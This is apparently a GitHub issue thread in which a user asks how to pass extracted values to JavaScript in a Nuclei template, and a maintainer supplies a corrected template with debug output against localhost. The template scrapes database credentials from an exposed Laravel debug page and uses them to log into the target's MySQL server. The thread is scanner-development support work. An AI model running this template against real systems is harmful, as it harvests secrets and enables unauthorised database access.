how to pass param to javascript with extract from http

[anquanscan]

id: laravel-debug-error-dbpass

info:
  name: laravel-debug-error-dbpass
  author: laravel-debug-error-dbpass
  severity: high

flow: |
  
  if(http(1)==true){
      set("DB_USERNAME",template["DB_USERNAME"])
      set("DB_HOST",template["DB_HOST"])
      set("DB_PORT",template["DB_PORT"])
      set("DB_PASSWORD",template["DB_PASSWORD"])
      javascript(1)
  }

http:
  - raw:
      - |
        PUT /index.php HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - contains_all(body,"DB_USERNAME","DB_PASSWORD")


    extractors:
      - type: xpath
        name: DB_USERNAME
        part: body_1
        internal: true
        xpath:
          - //td[text()="DB_USERNAME"]/following-sibling::td/pre/span/text()


      - type: xpath
        name: DB_PASSWORD
        part: body_1
        internal: true
        xpath:
          - //td[text()="DB_PASSWORD"]/following-sibling::td/pre/span/text()


      - type: xpath
        name: DB_HOST
        part: body_1
        internal: true
        xpath:
          - //td[text()="DB_HOST"]/following-sibling::td/pre/span/text()

      - type: xpath
        name: DB_PORT
        part: body_1
        internal: true
        xpath:
          - //td[text()="DB_PORT"]/following-sibling::td/pre/span/text()

javascript:
  - code: |
      let m = require('nuclei/mysql');
      let c = m.MySQLClient();
      let result = c.Connect( DB_HOST, DB_PORT, DB_USERNAME,DB_PASSWORD);
      //log(template)
      set("DB_USERNAME",template["DB_USERNAME"])
      set("DB_HOST",template["DB_HOST"])
      set("DB_PORT",template["DB_PORT"])
      set("DB_PASSWORD",template["DB_PASSWORD"])

above is not work

[olearycrew]

@tarunKoyalwar could you take a look at this one?

[tarunKoyalwar]

@anquanscan , here's the final template with changes and explaination

id: laravel-debug-error-dbpass

info:
  name: laravel-debug-error-dbpass
  author: laravel-debug-error-dbpass
  severity: high

# extracted values are directly available in subsequent requests no need to use `set(var,varValue)` 
flow: http() & javascript()

http:
  - raw:
      - |
        PUT /index.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        internal: true    # <- this needs to be added to avoid printing this result in cli
        dsl:
          - contains_all(body,"DB_USERNAME","DB_PASSWORD")

# you need to use `body` and not `body_1` because request condition is only available if one protocol has more than 1 request (docs: https://docs.projectdiscovery.io/templates/protocols/http/basic-http#request-condition)
    extractors:
      - type: xpath
        name: DB_USERNAME
        part: body  # <- changed to body from body_1
        internal: true
        xpath:
          - //td[text()="DB_USERNAME"]/following-sibling::td/pre/span/text()


      - type: xpath
        name: DB_PASSWORD
        part: body  # <- changed to body from body_1
        internal: true
        xpath:
          - //td[text()="DB_PASSWORD"]/following-sibling::td/pre/span/text()


      - type: xpath
        name: DB_HOST
        part: body  # <- changed to body from body_1
        internal: true
        xpath:
          - //td[text()="DB_HOST"]/following-sibling::td/pre/span/text()

      - type: xpath
        name: DB_PORT
        part: body  # <- changed to body from body_1
        internal: true
        xpath:
          - //td[text()="DB_PORT"]/following-sibling::td/pre/span/text()

javascript:
  - code: |
      let m = require('nuclei/mysql');
      let c = m.MySQLClient();
      c.Connect(dbhost, dbport, dbuser, dbpass);

# all variables that need to be passed to javascript has to be done from `args` and you can specify variable here  (ref: https://docs.projectdiscovery.io/templates/protocols/javascript/protocol#args-section) 
    args:
      dbhost: "{{DB_HOST}}"
      dbport: "{{DB_PORT}}"
      dbuser: "{{DB_USERNAME}}"
      dbpass: "{{DB_PASSWORD}}"
 #   body:  "{{http_body}}" # <- (example) you can access variables without set just use protocol prefix (here `http_` )   
    matchers:
      - type: dsl
        dsl:
          - success && response

Also you can always use -svd to print all variables that are available before and after request

$ ./nuclei -t a.yaml  -u http://localhost:8000 -v -svd                                          1 ↵

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.1.6-dev

		projectdiscovery.io

[VER] Started metrics server at localhost:9092
[INF] Current nuclei version: v3.1.6-dev (development)
[INF] Current nuclei-templates version: v9.7.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 46
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[DBG] HTTP Protocol request variables: 
	1. BaseURL => http://localhost:8000
	2. FQDN => localhost
	3. File => 
	4. Host => localhost
	5. Hostname => localhost:8000
	6. Input => http://localhost:8000
	7. Path => 
	8. Port => 8000
	9. RootURL => http://localhost:8000
	10. Scheme => http
	11. ip => 

[VER] [laravel-debug-error-dbpass] Sent HTTP request to http://localhost:8000/
[DBG] Http Protocol response variables: 
	1. BaseURL => http://localhost:8000
	2. FQDN => localhost
	3. File => 
	4. Host => localhost
	5. Hostname => localhost:8000
	6. Input => http://localhost:8000
	7. Path => 
	8. Port => 8000
	9. RootURL => http://localhost:8000
	10. Scheme => http
	11. accept_ranges => bytes
	12. all_headers => HTTP/1.1 200 OK  Connecti .... Jan 2024 18:29:02 GMT    
	13. body => <!DOCTYPE html> <html lan ....  </table> </body> </html>
	14. content_length => 744
	15. content_type => text/html; charset=utf-8
	16. curl-command => curl -X 'GET' -d '' -H 'H ....  'http://localhost:8000/'
	17. date => Mon, 15 Jan 2024 18:45:28 GMT
	18. duration => 0.003306833
	19. header => HTTP/1.1 200 OK  Connecti .... Jan 2024 18:29:02 GMT    
	20. host => http://localhost:8000
	21. http_accept_ranges => bytes
	22. http_all_headers => HTTP/1.1 200 OK  Connecti .... Jan 2024 18:29:02 GMT    
	23. http_body => <!DOCTYPE html> <html lan ....  </table> </body> </html>
	24. http_content_length => 744
	25. http_content_type => text/html; charset=utf-8
	26. http_date => Mon, 15 Jan 2024 18:45:28 GMT
	27. http_duration => 0.003306833
	28. http_header => HTTP/1.1 200 OK  Connecti .... Jan 2024 18:29:02 GMT    
	29. http_host => http://localhost:8000
	30. http_last_modified => Mon, 15 Jan 2024 18:29:02 GMT
	31. http_matched => http://localhost:8000/
	32. http_request => GET / HTTP/1.1  Host: loc .... Accept-Encoding: gzip    
	33. http_response => HTTP/1.1 200 OK  Connecti ....  </table> </body> </html>
	34. http_status_code => 200
	35. http_type => http
	36. interactsh-server => 
	37. ip => 127.0.0.1
	38. last_modified => Mon, 15 Jan 2024 18:29:02 GMT
	39. matched => http://localhost:8000/
	40. request => GET / HTTP/1.1  Host: loc .... Accept-Encoding: gzip    
	41. response => HTTP/1.1 200 OK  Connecti ....  </table> </body> </html>
	42. status_code => 200
	43. template-id => laravel-debug-error-dbpass
	44. template-info => {laravel-debug-error-dbpa .... nil> {high} map[] <nil> }
	45. template-path => /Users/tarun/Codebase/nuclei/a.yaml
	46. type => http

[DBG] Javascript Protocol request variables: 
	1. DB_HOST => localhost
	2. DB_PASSWORD => myPassword
	3. DB_PORT => 3306
	4. DB_USERNAME => myUsername
	5. FQDN => localhost
	6. Host => localhost
	7. Hostname => localhost:8000
	8. Port => 8000
	9. http_accept_ranges => bytes
	10. http_all_headers => HTTP/1.1 200 OK  Connecti .... Jan 2024 18:29:02 GMT    
	11. http_body => <!DOCTYPE html> <html lan ....  </table> </body> </html>
	12. http_content_length => 744
	13. http_content_type => text/html; charset=utf-8
	14. http_date => Mon, 15 Jan 2024 18:45:28 GMT
	15. http_duration => 0.003306833
	16. http_header => HTTP/1.1 200 OK  Connecti .... Jan 2024 18:29:02 GMT    
	17. http_host => http://localhost:8000
	18. http_last_modified => Mon, 15 Jan 2024 18:29:02 GMT
	19. http_matched => http://localhost:8000/
	20. http_request => GET / HTTP/1.1  Host: loc .... Accept-Encoding: gzip    
	21. http_response => HTTP/1.1 200 OK  Connecti ....  </table> </body> </html>
	22. http_status_code => 200
	23. http_type => http

[VER] [laravel-debug-error-dbpass] Sent Javascript request to localhost:8000
[DBG] Javascript Protocol response variables: 
	1. DB_HOST => localhost
	2. DB_PASSWORD => myPassword
	3. DB_PORT => 3306
	4. DB_USERNAME => myUsername
	5. FQDN => localhost
	6. Host => localhost
	7. Hostname => localhost:8000
	8. Port => 8000
	9. error => GoError: dial tcp [::1]:3 .... .methodValueCall (native)
	10. host => http://localhost:8000
	11. http_accept_ranges => bytes
	12. http_all_headers => HTTP/1.1 200 OK  Connecti .... Jan 2024 18:29:02 GMT    
	13. http_body => <!DOCTYPE html> <html lan ....  </table> </body> </html>
	14. http_content_length => 744
	15. http_content_type => text/html; charset=utf-8
	16. http_date => Mon, 15 Jan 2024 18:45:28 GMT
	17. http_duration => 0.003306833
	18. http_header => HTTP/1.1 200 OK  Connecti .... Jan 2024 18:29:02 GMT    
	19. http_host => http://localhost:8000
	20. http_last_modified => Mon, 15 Jan 2024 18:29:02 GMT
	21. http_matched => http://localhost:8000/
	22. http_request => GET / HTTP/1.1  Host: loc .... Accept-Encoding: gzip    
	23. http_response => HTTP/1.1 200 OK  Connecti ....  </table> </body> </html>
	24. http_status_code => 200
	25. http_type => http
	26. javascript_DB_HOST => localhost
	27. javascript_DB_PASSWORD => myPassword
	28. javascript_DB_PORT => 3306
	29. javascript_DB_USERNAME => myUsername
	30. javascript_FQDN => localhost
	31. javascript_Host => localhost
	32. javascript_Hostname => localhost:8000
	33. javascript_Port => 8000
	35. javascript_host => http://localhost:8000
	36. javascript_http_accept_ranges => bytes
	37. javascript_http_all_headers => HTTP/1.1 200 OK  Connecti .... Jan 2024 18:29:02 GMT    
	38. javascript_http_body => <!DOCTYPE html> <html lan ....  </table> </body> </html>
	39. javascript_http_content_length => 744
	40. javascript_http_content_type => text/html; charset=utf-8
	41. javascript_http_date => Mon, 15 Jan 2024 18:45:28 GMT
	42. javascript_http_duration => 0.003306833
	43. javascript_http_header => HTTP/1.1 200 OK  Connecti .... Jan 2024 18:29:02 GMT    
	44. javascript_http_host => http://localhost:8000
	45. javascript_http_last_modified => Mon, 15 Jan 2024 18:29:02 GMT
	46. javascript_http_matched => http://localhost:8000/
	47. javascript_http_request => GET / HTTP/1.1  Host: loc .... Accept-Encoding: gzip    
	48. javascript_http_response => HTTP/1.1 200 OK  Connecti ....  </table> </body> </html>
	49. javascript_http_status_code => 200
	50. javascript_http_type => http
	51. javascript_matched => localhost:8000
	52. javascript_request => let m = require('nuclei/m ....  dbport, dbuser, dbpass);
	53. javascript_success => false
	54. javascript_type => javascript
	55. matched => localhost:8000
	56. request => let m = require('nuclei/m ....  dbport, dbuser, dbpass);
	57. success => true
	58. response => true
	59. template-id => laravel-debug-error-dbpass
	60. template-info => {laravel-debug-error-dbpa .... nil> {high} map[] <nil> }
	61. template-path => /Users/tarun/Codebase/nuclei/a.yaml
	62. type => javascript

[laravel-debug-error-dbpass] [javascript] [high] http://localhost:8000/

I would recommend docs for more details and example of each feature (especially flow , javascript , dynamic extractors , request condition, internal matcher ) at https://docs.projectdiscovery.io/templates/protocols/javascript/protocol#args-section

cc: @olearycrew